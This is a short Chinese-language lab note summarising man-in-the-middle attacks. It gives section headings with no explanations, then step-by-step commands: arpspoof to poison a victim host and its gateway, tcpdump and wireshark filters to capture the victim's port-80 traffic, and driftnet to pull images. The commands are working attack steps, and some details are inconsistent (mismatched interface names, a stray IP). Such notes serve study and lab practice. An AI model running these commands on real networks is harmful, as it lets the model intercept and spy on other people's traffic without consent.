中间人攻击总结

中间人攻击(MITM)

1. 原理

APR 欺骗

三种方式

SSL证书伪造

伪造过程

SSL卸载

卸载过程

原因

基于中间人攻击的DNS劫持

中间人攻击实例

前提

工具

• tcpdump
• wireshark
• driftnet
• urlsnarf
• arpspoof

环境

• 攻击者　10.108.113.147
• 被攻击者　10.108.112.243
• 网关 10.108.112.1
  　

实战步骤

1. 开启ARP欺骗

arpspoof -i eth0 -t 10.108.112.243 10.108.112.1
欺骗目标主机 当前主机 是网关

arpspoof -i eth0 -t 10.108.112.1 10.108.112.243
欺骗网关 当前主机是112.243
10.108.115.122

2. 使用tcpdump 查看tcp信息

查看80端口

tcpdump -i eno0 dst host 10.108.112.243 and port 80

tcpdump -i enp2s0 '((tcp) and (port 80) and ((host 10.108.113.147)))' -A

查看 被攻击主机的80端口信息

使用 wireshark

ip.host == 10.108.115.122 and tcp.port ==80

使用 driftnet 捕捉图片

driftnet -i etn0